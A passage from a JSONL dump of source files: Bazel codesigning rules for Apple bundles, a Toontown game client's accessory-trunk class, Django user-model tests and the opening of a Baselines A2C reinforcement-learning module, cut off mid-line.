invocations for the bundle.\n \"\"\"\n provisioning_profile = _provisioning_profile(ctx)\n\n commands = []\n\n # Use of the entitlements file is not recommended for the signing of frameworks. As long as\n # this remains the case, we do have to split the \"paths to sign\" between multiple invocations\n # of codesign.\n for path_to_sign in paths_to_sign:\n codesign_command = [ctx.executable._codesigningtool.path]\n codesign_command.extend(_codesign_args_for_path(\n ctx,\n path_to_sign,\n provisioning_profile,\n entitlements_file,\n ))\n commands.append(\" \".join(codesign_command))\n return \"\\n\".join(commands)\n\ndef _should_sign_simulator_bundles(ctx):\n \"\"\"Check if a main bundle should be codesigned.\n\n The Frameworks/* bundles should *always* be signed, this is just for\n the other bundles.\n\n Args:\n ctx: The Starlark context.\n\n Returns:\n True/False for if the bundle should be signed.\n\n \"\"\"\n rule_descriptor = rule_support.rule_descriptor(ctx)\n if not rule_descriptor.skip_simulator_signing_allowed:\n return True\n\n # Default is to sign.\n return defines.bool_value(\n ctx,\n \"apple.codesign_simulator_bundles\",\n True,\n )\n\ndef _should_sign_bundles(ctx):\n should_sign_bundles = True\n\n rule_descriptor = rule_support.rule_descriptor(ctx)\n codesigning_exceptions = rule_descriptor.codesigning_exceptions\n if (codesigning_exceptions ==\n rule_support.codesigning_exceptions.sign_with_provisioning_profile):\n # If the rule doesn't have a provisioning profile, do not sign the binary or its\n # frameworks.\n provisioning_profile = getattr(ctx.file, \"provisioning_profile\", None)\n if not provisioning_profile:\n should_sign_bundles = False\n elif codesigning_exceptions == rule_support.codesigning_exceptions.skip_signing:\n should_sign_bundles = False\n elif codesigning_exceptions != rule_support.codesigning_exceptions.none:\n fail(\"Internal Error: Encountered unsupported state for codesigning_exceptions.\")\n\n return should_sign_bundles\n\ndef _codesigning_args(\n ctx,\n entitlements,\n full_archive_path,\n is_framework = False):\n \"\"\"Returns a set of codesigning arguments to be passed to the codesigning tool.\n\n Args:\n ctx: The rule context.\n entitlements: The entitlements file to sign with. Can be None.\n full_archive_path: The full path to the codesigning target.\n is_framework: If the target is a framework. False by default.\n\n Returns:\n A list containing the arguments to pass to the codesigning tool.\n \"\"\"\n if not _should_sign_bundles(ctx):\n return []\n\n is_device = platform_support.is_device_build(ctx)\n if not is_framework and not is_device and not _should_sign_simulator_bundles(ctx):\n return []\n\n return _codesign_args_for_path(\n ctx,\n _path_to_sign(full_archive_path),\n provisioning_profile = _provisioning_profile(ctx),\n entitlements_file = entitlements,\n shell_quote = False,\n )\n\ndef _codesigning_command(\n ctx,\n entitlements,\n frameworks_path,\n signed_frameworks,\n bundle_path = \"\"):\n \"\"\"Returns a codesigning command that includes framework embedded bundles.\n\n Args:\n ctx: The rule context.\n entitlements: The entitlements file to sign with. Can be None.\n frameworks_path: The location of the Frameworks directory, relative to the archive.\n signed_frameworks: A depset containing each framework that has already been signed.\n bundle_path: The location of the bundle, relative to the archive.\n\n Returns:\n A string containing the codesigning commands.\n \"\"\"\n if not _should_sign_bundles(ctx):\n return \"\"\n\n paths_to_sign = []\n\n # The command returned by this function is executed as part of a bundling shell script.\n # Each directory to be signed must be prefixed by $WORK_DIR, which is the variable in that\n # script that contains the path to the directory where the bundle is being built.\n if frameworks_path:\n framework_root = paths.join(\"$WORK_DIR\", frameworks_path) + \"/\"\n full_signed_frameworks = []\n\n for signed_framework in signed_frameworks.to_list():\n full_signed_frameworks.append(paths.join(framework_root, signed_framework))\n\n paths_to_sign.append(\n _path_to_sign(\n framework_root,\n is_directory = True,\n signed_frameworks = full_signed_frameworks,\n use_entitlements = False,\n ),\n )\n\n is_device = platform_support.is_device_build(ctx)\n if is_device or _should_sign_simulator_bundles(ctx):\n path_to_sign = paths.join(\"$WORK_DIR\", bundle_path)\n paths_to_sign.append(\n _path_to_sign(path_to_sign),\n )\n return _signing_command_lines(\n ctx,\n paths_to_sign = paths_to_sign,\n entitlements_file = entitlements,\n )\n\ndef _post_process_and_sign_archive_action(\n ctx,\n archive_codesigning_path,\n frameworks_path,\n input_archive,\n output_archive,\n output_archive_root_path,\n signed_frameworks,\n entitlements = None):\n \"\"\"Post-processes and signs an archived bundle.\n\n Args:\n ctx: The target's rule context.\n archive_codesigning_path: The codesigning path relative to the archive.\n frameworks_path: The Frameworks path relative to the archive.\n input_archive: The `File` representing the archive containing the bundle\n that has not yet been processed or signed.\n output_archive: The `File` representing the processed and signed archive.\n output_archive_root_path: The `string` path to where the processed, uncompressed archive\n should be located.\n signed_frameworks: Depset containing each framework that has already been signed.\n entitlements: Optional file representing the entitlements to sign with.\n \"\"\"\n input_files = [input_archive]\n processing_tools = []\n\n signing_command_lines = _codesigning_command(\n ctx,\n entitlements,\n frameworks_path,\n signed_frameworks,\n bundle_path = archive_codesigning_path,\n )\n if signing_command_lines:\n processing_tools.append(ctx.executable._codesigningtool)\n if entitlements:\n input_files.append(entitlements)\n provisioning_profile = getattr(ctx.file, \"provisioning_profile\", None)\n if provisioning_profile:\n input_files.append(provisioning_profile)\n\n ipa_post_processor = ctx.executable.ipa_post_processor\n ipa_post_processor_path = \"\"\n if ipa_post_processor:\n processing_tools.append(ipa_post_processor)\n ipa_post_processor_path = ipa_post_processor.path\n\n # Only compress the IPA for optimized (release) builds or when requested.\n # For debug builds, zip without compression, which will speed up the build.\n compression_requested = defines.bool_value(ctx, \"apple.compress_ipa\", False)\n should_compress = (ctx.var[\"COMPILATION_MODE\"] == \"opt\") or compression_requested\n\n # TODO(b/163217926): These are kept the same for the three different actions\n # that could be run to ensure anything keying off these values continues to\n # work. After some data is collected, the values likely can be revisited and\n # changed.\n mnemonic = \"ProcessAndSign\"\n progress_message = \"Processing and signing %s\" % ctx.label.name\n\n # If there is no work to be done, skip the processing/signing action, just\n # copy the file over.\n has_work = any([signing_command_lines, ipa_post_processor_path, should_compress])\n if not has_work:\n ctx.actions.run_shell(\n inputs = [input_archive],\n outputs = [output_archive],\n mnemonic = mnemonic,\n progress_message = progress_message,\n command = \"cp -p '%s' '%s'\" % (input_archive.path, output_archive.path),\n )\n return\n\n process_and_sign_template = intermediates.file(\n ctx.actions,\n ctx.label.name,\n \"process-and-sign-%s.sh\" % hash(output_archive.path),\n )\n ctx.actions.expand_template(\n template = ctx.file._process_and_sign_template,\n output = process_and_sign_template,\n is_executable = True,\n substitutions = {\n \"%ipa_post_processor%\": ipa_post_processor_path or \"\",\n \"%output_path%\": output_archive.path,\n \"%should_compress%\": \"1\" if should_compress else \"\",\n \"%signing_command_lines%\": signing_command_lines,\n \"%unprocessed_archive_path%\": input_archive.path,\n \"%work_dir%\": output_archive_root_path,\n },\n )\n\n # Build up some arguments for the script to allow logging to tell what work\n # is being done within the action's script.\n arguments = []\n if signing_command_lines:\n arguments.append(\"should_sign\")\n if ipa_post_processor_path:\n arguments.append(\"should_process\")\n if should_compress:\n arguments.append(\"should_compress\")\n\n run_on_darwin = any([signing_command_lines, ipa_post_processor_path])\n if run_on_darwin:\n legacy_actions.run(\n ctx,\n inputs = input_files,\n outputs = [output_archive],\n executable = process_and_sign_template,\n arguments = arguments,\n mnemonic = mnemonic,\n progress_message = progress_message,\n execution_requirements = {\n # Added so that the output of this action is not cached remotely, in case multiple\n # developers sign the same artifact with different identities.\n \"no-cache\": \"1\",\n # Unsure, but may be needed for keychain access, especially for files that live in\n # $HOME.\n \"no-sandbox\": \"1\",\n },\n tools = processing_tools,\n )\n else:\n ctx.actions.run(\n inputs = input_files,\n outputs = [output_archive],\n executable = process_and_sign_template,\n arguments = arguments,\n mnemonic = mnemonic,\n progress_message = progress_message,\n )\n\ndef _sign_binary_action(ctx, input_binary, output_binary):\n \"\"\"Signs the input binary file, copying it into the given output binary file.\n\n Args:\n ctx: The target's rule context.\n input_binary: The `File` representing the binary to be signed.\n output_binary: The `File` representing signed binary.\n \"\"\"\n\n # It's not hermetic to sign the binary that was built by the apple_binary\n # target that this rule takes as an input, so we copy it and then execute the\n # code signing commands on that copy in the same action.\n path_to_sign = _path_to_sign(output_binary.path)\n signing_commands = _signing_command_lines(\n ctx,\n [path_to_sign],\n None,\n )\n\n legacy_actions.run_shell(\n ctx,\n inputs = [input_binary],\n outputs = [output_binary],\n command = [\n \"/bin/bash\",\n \"-c\",\n \"cp {input_binary} {output_binary}\".format(\n input_binary = input_binary.path,\n output_binary = output_binary.path,\n ) + \"\\n\" + signing_commands,\n ],\n mnemonic = \"SignBinary\",\n execution_requirements = {\n # Added so that the output of this action is not cached remotely, in case multiple\n # developers sign the same artifact with different identities.\n \"no-cache\": \"1\",\n # Unsure, but may be needed for keychain access, especially for files that live in\n # $HOME.\n \"no-sandbox\": \"1\",\n },\n tools = [\n ctx.executable._codesigningtool,\n ],\n )\n\ncodesigning_support = struct(\n codesigning_args = _codesigning_args,\n codesigning_command = _codesigning_command,\n post_process_and_sign_archive_action = _post_process_and_sign_archive_action,\n provisioning_profile = _provisioning_profile,\n sign_binary_action = _sign_binary_action,\n)\n"} {"ext": "py", "sha": "1a2f50f2434ae8e043b6001f11ce27ca488d5dc3", "content": "from panda3d.core import *\nfrom direct.gui.DirectGui import *\nfrom direct.task.Task import Task\nfrom direct.interval.IntervalGlobal import *\nimport DistributedCloset, ClosetGlobals, TrunkGUI\nfrom toontown.toon import ToonDNA\nfrom toontown.toonbase import TTLocalizer\nfrom toontown.toonbase import ToontownGlobals\nN_A = 0\n\nclass DistributedTrunk(DistributedCloset.DistributedCloset):\n notify = directNotify.newCategory('DistributedTrunk')\n\n def __init__(self, cr):\n DistributedCloset.DistributedCloset.__init__(self, cr)\n self.hatList = []\n self.glassesList = []\n self.backpackList = []\n self.shoesList = []\n self.oldHatList = []\n self.oldGlassesList = []\n self.oldBackpackList = []\n self.oldShoesList = []\n self.swapHatEvent = ''\n self.swapGlassesEvent = ''\n self.swapBackpackEvent = ''\n self.swapShoesEvent = ''\n self.hatDeleted = 0\n self.glassesDeleted = 0\n self.backpackDeleted = 0\n self.shoesDeleted = 0\n self.isFreePlayer = 0\n\n def printInfo(self):\n print 'avid: %s, gender: %s' % (self.av.doId, self.av.style.gender)\n print 'current hat = %s, glasses = %s, backpack = %s, shoes = %s' % (self.av.getHat(),\n self.av.getGlasses(),\n self.av.getBackpack(),\n self.av.getShoes())\n print 'hatList = %s' % self.av.getHatList()\n print 'glassesList = %s' % self.av.getGlassesList()\n print 'backpackList = %s' % self.av.getBackpackList()\n print 'shoesList = %s' % self.av.getShoesList()\n\n def setState(self, mode, avId, ownerId, gender, hatList, glassesList, backpackList, shoesList):\n self.notify.debug('setState, mode=%s, avId=%s, ownerId=%d' % (mode, avId, ownerId))\n self.isOwner = avId == ownerId\n self.ownerGender = gender\n if mode == ClosetGlobals.CLOSED:\n self.fsm.request('closed')\n return\n else:\n if mode == ClosetGlobals.OPEN:\n self.customerId = avId\n self.av = self.cr.doId2do.get(self.customerId, None)\n if self.av:\n if self.av.getGameAccess() != ToontownGlobals.AccessFull:\n self.isOwner = 0\n self.isFreePlayer = 1\n else:\n self.isFreePlayer = 0\n if base.localAvatar.getDoId() == self.customerId:\n self.gender = self.av.style.gender\n self.hatList = hatList\n self.glassesList = glassesList\n self.backpackList = backpackList\n self.shoesList = shoesList\n self.oldHatList = self.hatList[0:]\n self.oldGlassesList = self.glassesList[0:]\n self.oldBackpackList = self.backpackList[0:]\n self.oldShoesList = self.shoesList[0:]\n print '-----------Starting trunk interaction-----------'\n self.printInfo()\n print '-------------------------------------------------'\n if not self.isOwner:\n self.__popupNotOwnerPanel()\n else:\n taskMgr.doMethodLater(0.5, self.popupChangeClothesGUI, self.uniqueName('popupChangeClothesGUI'))\n self.fsm.request('open')\n return\n\n def load(self):\n lNode = self.find('**/lid_origin')\n lLid = self.find('**/lid')\n if lNode.isEmpty() or lLid.isEmpty():\n self.lid = None\n else:\n lLid.wrtReparentTo(lNode)\n self.lid = lNode\n if not lNode.isEmpty():\n self.scale = lLid.getScale()[0] * 0.6\n return\n\n def popupChangeClothesGUI(self, task):\n self.notify.debug('popupChangeClothesGUI')\n self.purchaseDoneEvent = self.uniqueName('purchaseDone')\n self.swapHatEvent = self.uniqueName('swapHat')\n self.swapGlassesEvent = self.uniqueName('swapGlasses')\n self.swapBackpackEvent = self.uniqueName('swapBackpack')\n self.swapShoesEvent = self.uniqueName('swapShoes')\n self.cancelEvent = self.uniqueName('cancel')\n self.accept(self.purchaseDoneEvent, self.__proceedToCheckout)\n self.accept(self.swapHatEvent, self.__handleSwapHat)\n self.accept(self.swapGlassesEvent, self.__handleSwapGlasses)\n self.accept(self.swapBackpackEvent, self.__handleSwapBackpack)\n self.accept(self.swapShoesEvent, self.__handleSwapShoes)\n self.accept(self.cancelEvent, self._handleCancel)\n self.deleteEvent = self.uniqueName('delete')\n if self.isOwner:\n self.accept(self.deleteEvent, self.__handleDelete)\n if not self.closetGUI:\n self.closetGUI = TrunkGUI.TrunkGUI(self.isOwner, self.purchaseDoneEvent, self.cancelEvent, self.swapHatEvent, self.swapGlassesEvent, self.swapBackpackEvent, self.swapShoesEvent, self.deleteEvent, self.hatList, self.glassesList, self.backpackList, self.shoesList)\n self.closetGUI.load()\n if self.gender != self.ownerGender:\n self.closetGUI.setGender(self.ownerGender)\n self.closetGUI.enter(base.localAvatar)\n self.closetGUI.showButtons()\n oldHat = self.av.getHat()\n oldGlasses = self.av.getGlasses()\n oldBackpack = self.av.getBackpack()\n oldShoes = self.av.getShoes()\n self.oldStyle = {ToonDNA.HAT: oldHat, ToonDNA.GLASSES: oldGlasses, \n ToonDNA.BACKPACK: oldBackpack, \n ToonDNA.SHOES: oldShoes}\n return Task.done\n\n def resetCloset(self):\n self.ignoreAll()\n taskMgr.remove(self.uniqueName('popupChangeClothesGUI'))\n taskMgr.remove(self.uniqueName('lerpCamera'))\n taskMgr.remove(self.uniqueName('lerpToon'))\n if self.closetGUI:\n self.closetGUI.hideButtons()\n self.closetGUI.exit()\n self.closetGUI.unload()\n self.closetGUI = None\n del self.av\n self.av = base.localAvatar\n oldHat = self.av.getHat()\n oldGlasses = self.av.getGlasses()\n oldBackpack = self.av.getBackpack()\n oldShoes = self.av.getShoes()\n self.oldStyle = {ToonDNA.HAT: oldHat, ToonDNA.GLASSES: oldGlasses, \n ToonDNA.BACKPACK: oldBackpack, \n ToonDNA.SHOES: oldShoes}\n self.hatDeleted = 0\n self.glassesDeleted = 0\n self.backpackDeleted = 0\n self.shoesDeleted = 0\n return Task.done\n\n def _handleCancel(self):\n if self.oldStyle:\n oldHat = self.oldStyle[ToonDNA.HAT]\n oldGlasses = self.oldStyle[ToonDNA.GLASSES]\n oldBackpack = self.oldStyle[ToonDNA.BACKPACK]\n oldShoes = self.oldStyle[ToonDNA.SHOES]\n self.d_setDNA(oldHat[0], oldHat[1], oldHat[2], oldGlasses[0], oldGlasses[1], oldGlasses[2], oldBackpack[0], oldBackpack[1], oldBackpack[2], oldShoes[0], oldShoes[1], oldShoes[2], 1)\n else:\n self.notify.info('avoided crash in handleCancel')\n self._handlePurchaseDone()\n if self.closetGUI:\n self.closetGUI.resetClothes(self.oldStyle)\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n return\n\n def __handleSwapHat(self):\n item = self.av.getHat()\n self.d_setDNA(item[0], item[1], item[2], N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, 0, ToonDNA.HAT)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleSwapGlasses(self):\n item = self.av.getGlasses()\n self.d_setDNA(N_A, N_A, N_A, item[0], item[1], item[2], N_A, N_A, N_A, N_A, N_A, N_A, 0, ToonDNA.GLASSES)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleSwapBackpack(self):\n item = self.av.getBackpack()\n self.d_setDNA(N_A, N_A, N_A, N_A, N_A, N_A, item[0], item[1], item[2], N_A, N_A, N_A, 0, ToonDNA.BACKPACK)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleSwapShoes(self):\n item = self.av.getShoes()\n self.d_setDNA(N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, N_A, item[0], item[1], item[2], 0, ToonDNA.SHOES)\n if self.closetGUI:\n self.closetGUI.updateTrashButtons()\n\n def __handleDelete(self, which):\n if which == ToonDNA.HAT:\n itemList = self.closetGUI.hats\n trashIndex = self.closetGUI.hatChoice\n swapFunc = self.closetGUI.swapHat\n removeFunc = self.closetGUI.removeHat\n trashItem = self.av.getHat()\n self.hatDeleted = self.hatDeleted | 1\n elif which == ToonDNA.GLASSES:\n itemList = self.closetGUI.glasses\n trashIndex = self.closetGUI.glassesChoice\n swapFunc = self.closetGUI.swapGlasses\n removeFunc = self.closetGUI.removeGlasses\n trashItem = self.av.getGlasses()\n self.glassesDeleted = self.glassesDeleted | 1\n elif which == ToonDNA.BACKPACK:\n itemList = self.closetGUI.backpacks\n trashIndex = self.closetGUI.backpackChoice\n swapFunc = self.closetGUI.swapBackpack\n removeFunc = self.closetGUI.removeBackpack\n trashItem = self.av.getBackpack()\n self.backpackDeleted = self.backpackDeleted | 1\n elif which == ToonDNA.SHOES:\n itemList = self.closetGUI.shoes\n trashIndex = self.closetGUI.shoesChoice\n swapFunc = self.closetGUI.swapShoes\n removeFunc = self.closetGUI.removeShoes\n trashItem = self.av.getShoes()\n self.shoesDeleted = self.shoesDeleted | 1\n else:\n self.notify.warning(\"we don't know about this item(type = %s)\" % which)\n return\n if len(itemList) > 1:\n if trashIndex == 0:\n swapFunc(1)\n else:\n swapFunc(-1)\n removeFunc(trashIndex)\n self.sendUpdate('removeItem', [trashItem[0],\n trashItem[1],\n trashItem[2],\n which])\n swapFunc(0)\n self.closetGUI.updateTrashButtons()\n else:\n self.notify.warning(\"cant delete this item(type = %s), since we don't have a replacement\" % which)\n\n def resetItemLists(self):\n self.hatList = self.oldHatList[0:]\n self.glassesList = self.oldGlassesList[0:]\n self.backpackList = self.oldBackpackList[0:]\n self.shoesList = self.oldShoesList[0:]\n self.closetGUI.hat = self.hatList\n self.closetGUI.glasses = self.glassesList\n self.closetGUI.backpack = self.backpackList\n self.closetGUI.shoes = self.shoesList\n self.hatDeleted = 0\n self.glassesDeleted = 0\n self.backpackDeleted = 0\n self.shoesDeleted = 0\n\n def __proceedToCheckout(self):\n if self.hatDeleted or self.glassesDeleted or self.backpackDeleted or self.shoesDeleted:\n self.__popupAreYouSurePanel()\n else:\n self._handlePurchaseDone()\n\n def _handlePurchaseDone(self, timeout=0):\n if timeout == 1:\n oldHat = self.oldStyle[ToonDNA.HAT]\n oldGlasses = self.oldStyle[ToonDNA.GLASSES]\n oldBackpack = self.oldStyle[ToonDNA.BACKPACK]\n oldShoes = self.oldStyle[ToonDNA.SHOES]\n self.d_setDNA(oldHat[0], oldHat[1], oldHat[2], oldGlasses[0], oldGlasses[1], oldGlasses[2], oldBackpack[0], oldBackpack[1], oldBackpack[2], oldShoes[0], oldShoes[1], oldShoes[2], 1)\n else:\n which = 0\n if hasattr(self.closetGUI, 'hatChoice') and hasattr(self.closetGUI, 'glassesChoice') and hasattr(self.closetGUI, 'backpackChoice') and hasattr(self.closetGUI, 'shoesChoice'):\n if self.closetGUI.hatChoice != 0 or self.hatDeleted:\n which = which | ToonDNA.HAT\n if self.closetGUI.glassesChoice != 0 or self.glassesDeleted:\n which = which | ToonDNA.GLASSES\n if self.closetGUI.backpackChoice != 0 or self.backpackDeleted:\n which = which | ToonDNA.BACKPACK\n if self.closetGUI.shoesChoice != 0 or self.shoesDeleted:\n which = which | ToonDNA.SHOES\n hat = self.av.getHat()\n glasses = self.av.getGlasses()\n backpack = self.av.getBackpack()\n shoes = self.av.getShoes()\n self.d_setDNA(hat[0], hat[1], hat[2], glasses[0], glasses[1], glasses[2], backpack[0], backpack[1], backpack[2], shoes[0], shoes[1], shoes[2], 2, which)\n\n def d_setDNA(self, hatIdx, hatTexture, hatColor, glassesIdx, glassesTexture, glassesColor, backpackIdx, backpackTexture, backpackColor, shoesIdx, shoesTexture, shoesColor, finished, which=ToonDNA.HAT | ToonDNA.GLASSES | ToonDNA.BACKPACK | ToonDNA.SHOES):\n self.sendUpdate('setDNA', [hatIdx,\n hatTexture,\n hatColor,\n glassesIdx,\n glassesTexture,\n glassesColor,\n backpackIdx,\n backpackTexture,\n backpackColor,\n shoesIdx,\n shoesTexture,\n shoesColor,\n finished,\n which])\n\n def setCustomerDNA(self, avId, hatIdx, hatTexture, hatColor, glassesIdx, glassesTexture, glassesColor, backpackIdx, backpackTexture, backpackColor, shoesIdx, shoesTexture, shoesColor, which):\n if avId and avId != base.localAvatar.doId:\n av = base.cr.doId2do.get(avId, None)\n if av:\n if self.av == base.cr.doId2do[avId]:\n if which & ToonDNA.HAT:\n self.av.setHat(hatIdx, hatTexture, hatColor)\n if which & ToonDNA.GLASSES:\n self.av.setGlasses(glassesIdx, glassesTexture, glassesColor)\n if which & ToonDNA.BACKPACK:\n self.av.setBackpack(backpackIdx, backpackTexture, backpackColor)\n if which & ToonDNA.SHOES:\n self.av.setShoes(shoesIdx, shoesTexture, shoesColor)\n self.av.generateToonAccessories()\n return\n\n def __popupNotOwnerPanel(self):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n self.purchaseDoneEvent = self.uniqueName('purchaseDone')\n self.swapHatEvent = self.uniqueName('swapHat')\n self.swapGlassesEvent = self.uniqueName('swapGlasses')\n self.swapBackpackEvent = self.uniqueName('swapBackpack')\n self.swapShoesEvent = self.uniqueName('swapShoes')\n self.cancelEvent = self.uniqueName('cancel')\n self.accept(self.purchaseDoneEvent, self.__proceedToCheckout)\n self.accept(self.swapHatEvent, self.__handleSwapHat)\n self.accept(self.swapGlassesEvent, self.__handleSwapGlasses)\n self.accept(self.swapBackpackEvent, self.__handleSwapBackpack)\n self.accept(self.swapShoesEvent, self.__handleSwapShoes)\n self.accept(self.cancelEvent, self._handleCancel)\n self.deleteEvent = self.uniqueName('delete')\n if self.isOwner:\n self.accept(self.deleteEvent, self.__handleDelete)\n buttons = loader.loadModel('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n if self.isFreePlayer:\n textMsg = TTLocalizer.TrunkNotPaidMessage\n else:\n textMsg = TTLocalizer.TrunkNotOwnerMessage\n self.popupInfo = DirectFrame(parent=hidden, relief=None, state='normal', text=textMsg, frameSize=(-1,\n 1,\n -1,\n 1), text_wordwrap=10, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_scale=(0.88,\n 1,\n 0.55), geom_pos=(0,\n 0,\n -0.08), text_scale=0.08, text_pos=(0,\n 0.06))\n DirectButton(self.popupInfo, image=okButtonImage, relief=None, text=TTLocalizer.ClosetPopupOK, text_scale=0.05, text_pos=(0.0,\n -0.1), textMayChange=0, pos=(0.0,\n 0.0,\n -0.21), command=self._handleNotOwnerMessageOK)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n return\n\n def __popupAreYouSurePanel(self):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n buttons = loader.loadModel('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n cancelButtonImage = (buttons.find('**/CloseBtn_UP'), buttons.find('**/CloseBtn_DN'), buttons.find('**/CloseBtn_Rllvr'))\n self.popupInfo = DirectFrame(parent=hidden, relief=None, state='normal', text=TTLocalizer.TrunkAreYouSureMessage, frameSize=(-1,\n 1,\n -1,\n 1), text_wordwrap=10, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_scale=(0.88,\n 1,\n 0.55), geom_pos=(0,\n 0,\n -0.08), text_scale=0.08, text_pos=(0,\n 0.08))\n DirectButton(self.popupInfo, image=okButtonImage, relief=None, text=TTLocalizer.ClosetPopupOK, text_scale=0.05, text_pos=(0.0,\n -0.1), textMayChange=0, pos=(-0.1,\n 0.0,\n -0.21), command=self._handleYesImSure)\n DirectButton(self.popupInfo, image=cancelButtonImage, relief=None, text=TTLocalizer.ClosetPopupCancel, text_scale=0.05, text_pos=(0.0,\n -0.1), textMayChange=0, pos=(0.1,\n 0.0,\n -0.21), command=self._handleNotSure)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n return\n\n def _openDoors(self):\n if self.closetTrack:\n self.closetTrack.finish()\n openHpr = Vec3(0, -80, 0)\n if self.av:\n self.av.applyCheesyEffect(ToontownGlobals.CENormal)\n self.closetTrack = Parallel()\n if self.lid:\n self.closetTrack.append(self.lid.hprInterval(0.5, openHpr))\n self.closetTrack.start()\n\n def _closeDoors(self):\n if self.closetTrack:\n self.closetTrack.finish()\n closeHpr = Vec3(0, 0, 0)\n if self.av:\n self.av.reconsiderCheesyEffect()\n self.closetTrack = Parallel()\n if self.lid:\n self.closetTrack.append(self.lid.hprInterval(0.5, closeHpr))\n self.closetTrack.start()"} {"ext": "py", "sha": "1a2f5181a9936e57ec9cd7a2a19c2fae6dc7cd65", "content": "from django.test import TestCase\nfrom django.contrib.auth import get_user_model\n\n\nclass ModelTests(TestCase):\n\n def test_create_user_with_email_successful(self):\n email = 'kamransadixov@mail.ru'\n password = 'kam125486'\n\n \"\"\"\n get_user_model() returns the default user model.\n If it has to return custom usermodel, create a new model\n and in settings.py Set AUTH_USER_MODEL pointing to custom model\n \"\"\"\n user = get_user_model().objects.create_user(\n email=email,\n password=password\n )\n\n self.assertEqual(user.email, email)\n self.assertTrue(user.check_password(password))\n\n def test_new_user_email_normalize(self):\n email = 'tets@SADASD.com'\n user = get_user_model().objects.create_user(email, 'kam125486')\n\n self.assertEqual(user.email, email.lower())\n\n def test_new_user_invalid_email(self):\n \"\"\"Test email user with no email raises error\"\"\"\n with self.assertRaises(ValueError):\n get_user_model().objects.create_user(None, 'kam125486')\n\n def test_create_new_superuser(self):\n user = get_user_model().objects.create_superuser(\n 'kamransadikhov@yandex.com',\n 'kam125486'\n )\n\n self.assertTrue(user.is_superuser)\n self.assertTrue(user.is_staff)\n"} {"ext": "py", "sha": "1a2f51ef1dc8277bf84dd1bc84b6dd06be963ddc", "content": "import os.path as osp\nimport time\nimport joblib\nimport numpy as np\nimport tensorflow as tf\nfrom baselines import logger\nfrom collections import deque\n\nfrom baselines.common import set_global_seeds, explained_variance\nfrom baselines.common.runners import AbstractEnvRunner\nfrom baselines.common import tf_util\n\nfrom baselines.a2c.utils import discount_with_dones\nfrom baselines.a2c.utils import Scheduler, make_path, find_trainable_variables\nfrom baselines.a2c.utils import cat_entropy, mse\n\nclass Model(object):\n\n def __init__(self, policy, ob_space, ac_space, nenvs, nsteps,\n ent_coef=0.01, vf_coef=0.5, max_grad_norm=0.5, lr=7e-4,\n alpha=0.99, epsilon=1e-5, total_timesteps=int(80e6), lrschedule='linear'):\n\n sess = tf_util.make_session()\n nbatch = nenvs*nsteps\n\n A = tf.placeholder(tf.int32, [nbatch])\n ADV = tf.placeholder(tf.float32, [nbatch])\n R = tf.placeholder(tf.float32, [nbatch])\n LR = tf.placeholder(tf.float32, [])\n\n step_model = policy(sess, ob_space, ac_space, nenvs, 1, reuse=False)\n train_model = policy(sess, ob_space, ac_space, nenvs*nsteps, nsteps, reuse=True)\n\n neglogpac = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=train_model.pi, labels=A)\n pg_loss = tf.reduce_mean(ADV * neglogpac)\n vf_loss = tf.reduce_mean(mse(tf.squeeze(train_model.vf), R))\n entropy = tf.reduce_mean(cat_entropy(train_model.pi))\n loss = pg_loss - entropy*ent_coef + vf_loss * vf_coef\n\n params = find_trainable_variables(\"model\")\n grads = tf.gradients(loss, params)\n if max_grad_norm is not None:\n grads, grad_norm = tf.clip_by_global_norm(grads, max_grad_norm)\n grads = list(zip(grads, params))\n trainer = tf.train.RMSPropOptimizer(learning_rate=LR, decay=alpha, epsilon=epsilon)\n _train = trainer.apply_gradients(grads)\n\n lr = Scheduler(v=lr, nvalues=total_timesteps, schedule=lrschedule)\n\n def train(obs, states, rewards, masks, actions, values):\n advs = rewards - values\n for step in range(len(obs)):\n cur_lr = lr.value()\n td_map = {train_model.X:obs, A:actions, ADV:advs, R:rewards, LR:cur_lr}\n if states is not None:\n td_map[train_model.S] = states\n td_map[train_model.M] = masks\n policy_loss, value_loss, policy_entropy, _ = sess.run(\n [pg_loss, vf_loss, entropy, _train],\n td_map\n )\n return policy_loss, value_loss, policy_entropy\n\n def save(save_path):\n ps = sess.run(params)\n make_path(osp.dirname(save_path))\n joblib.dump(ps, save_path)\n\n def load(load_path):\n loaded_params = joblib.load(load_path)\n restores = []\n for p, loaded_p in zip(params, loaded_params):\n restores.append(p.assign(loaded_p))\n sess.run(restores)\n\n self.train = train\n self.train_model = train_model\n self.step_model = step_model\n self.step = step_model.step\n self.value = step_model.value\n self.initial_state = step_model.initial_state\n self.save = save\n self.load = load\n tf.global_variables_initializer().run(session=sess)\n\nclass Runner(AbstractEnvRunner):\n\n def __init__(self, env, model, nsteps=5, gamma=0.99):\n super().__init__(env=env, model=model, nsteps=nsteps)\n self.gamma = gamma\n self.episodes_count = 0\n\n def run(self):\n mb_obs, mb_rewards, mb_actions, mb_values, mb_dones = [],[],[],[],[]\n mb_states = self.states\n epinfos = []\n for n in range(self.nsteps):\n actions, values, states, _ = self.model.step(self.obs, self.states, self.dones)\n mb_obs.append(np.copy(self.obs))\n mb_actions.append(actions)\n mb_values.append(values)\n mb_dones.append(self.dones)\n obs, rewards, dones, infos = self.env.step(actions)\n for info in infos:\n maybeepinfo = info.get('episode')\n if 